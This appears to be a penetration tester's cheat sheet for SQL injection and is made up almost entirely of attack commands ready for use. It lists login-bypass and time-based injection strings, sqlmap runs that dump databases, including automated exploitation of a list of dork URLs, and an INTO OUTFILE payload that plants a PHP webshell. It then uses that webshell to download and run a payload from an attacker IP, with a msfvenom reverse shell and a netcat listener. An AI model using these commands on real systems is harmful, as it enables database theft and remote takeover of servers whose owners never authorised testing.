=================================== 
SQL Injection 

' 
" 
; 
OR 1=1-- -
' OR 1=1-- -
" OR 1=1-- -

admin' -- 
' OR 1=1 -- 
" OR 1=1 --  
' OR 1=1;# 
" OR 1=1 #  
',convert(int@@version))-- 

=================================== 
PHP SQLi Parameter "?"

View Page Source > Ctrl-F "?"  
http://192.168.200.5/room.php?cod=1'
Error/no-graphic = We have injection

=================================== 
Burp

If Burp finds a SQL Injection possibility.
Send it to SQLMap!

=================================== 
Cookie + Timebased Injection

Cookie: TrackingId=x'||dbms_pipe.receive_message(('a'),10)  ..oracle
Cookie: TrackingId=x'||WAITFOR DELAY '0:0:10'               ..MSSQL
Cookie: TrackingId=x'||pg_sleep(10)                         ..Postgres
Cookie: TrackingId=x'||sleep(10)                            ..mysql

Sqlmap Cookie attack
Add a * when you want sqlmap to attack something specific
sqlmap -u 'https://site/' --cookie='TrackingId=8g3RMzFVP*;session=8KZ7YvSx'


=================================== 
PHP Webshell

' AND 1=2 UNION SELECT database(),user(),version() -- 
' AND 1=2 UNION SELECT database(),user() -- 
' AND 1=2 UNION SELECT database() -- 
' AND 1=2 UNION SELECT "/etc/passwd","b","c"--' 
' UNION SELECT ("test") INTO OUTFILE 'C:/xampp/htdocs/test.php'  -- -' 
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -' 

Webshell 
curl "http://192.168.200.5:8080/cmd.php?cmd=whoami" 
curl "http://192.168.200.5:8080/cmd.php?cmd=dir" 
curl "http://192.168.200.5:8080/cmd.php?cmd=certutil -f -urlcache http://192.168.162.46:80/shell.exe 
curl "http://192.168.200.5:8080/cmd.php?cmd=shell.exe"

Webshell to Reverse 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.162.46 LPORT=53 -f exe -o reverse.exe       
python3 -m http.server 80 
nc -lvnp 53

=================================== 
Burp Request in Sqlmap

Burp > GET Request > R.Click > Copy to File 'burp.req'
sqlmap -r burp.req --batch --dbs
sqlmap -r burp.req --batch -D somedb --tables
sqlmap -r burp.req --batch -D somedb -T sometble --dump --threads 10

=================================== 
Burp Extensions

SQLiPy
https://github.com/PortSwigger/sqli-py
Install older jython = 2.7.2
Install SQLiPy from the BApp Store
Start the API
Target > Request > Extensions > Send to SQPiPy
Can do multiples.. manually.. click to start each
Result will show as a Finding under "Issues"

CO2 extension
Can help build Sqlmap statements


=================================== 
Auto-Answered

sqlmap -u 'http://site/product?id=1' -p 'id' --batch --random-agent 
--level=5 --risk=3 --thread 5 --dbs --output-dir="/tmp/"
--answer="extending=N,follow=N,keep=N,exploit=Y"
- extending: increase level and risk.
- follow: follow redirection.
- keep: keep running or not if connection timeout.
- exploit: exploit or not if target exploitable.


=================================== 
Dork List

sqlmap -m dorks.txt --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --level=5 --risk=3 --dbs
cat dorks.txt                                                                                        
http://siteone/include/chart_generator.php?session=1
http://sitetwo/pandora_console/include/whatever?param=555


=================================== 
Consider: mxweb mxcurls
